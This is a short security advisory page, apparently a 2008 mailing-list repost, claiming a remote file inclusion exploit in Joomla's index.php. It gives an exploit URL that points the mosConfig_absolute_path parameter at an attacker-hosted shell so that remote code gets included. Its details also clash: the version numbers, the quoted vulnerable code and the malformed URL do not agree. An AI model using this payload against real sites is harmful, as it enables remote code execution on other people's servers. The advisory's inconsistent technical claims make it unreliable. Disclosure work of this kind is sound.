Security Advisory: Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PKs Movie Database version 3.0.3 (SQL/XSS)
  Joovili <= v.2.1 (members_help.
php) Remote File İnclude Vulnerability
  Blackboard (id) Remote SQL Injection
  Husrev Forums v2.0.1:PoWerBoard (tr) (id) Remote SQL Injection

From: crazy_kinq_(at)_hotmail.co.uk <crazy_kinq_(at)_hotmail.co.uk>
Date: 10.02.2008
Subject: Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

#================================================================================
==============
#Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit
#================================================================================
===============
#
#Critical Level : Dangerous
#
#
#
#Version : v2.3.1 & v2.3.0
#
#================================================================================
================
#Bug in : Index.php
#
#Vlu Code :
#--------------------------------
#     include_once($config['path_src_include'] . "common.inc.php");
#
#
#================================================================================
================
#
#Exploit :include( $mosConfig_absolute_path .'/offlinebar.php'
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com
#
#
#================================================================================
================
#Discoverd By : Fegla
#
#Conatact : alex_zooz_zooz[at]hotmail.com
#
#GreetZ : Sub-Code   ,ShikaA , Wizard CC

=================================================================================
=================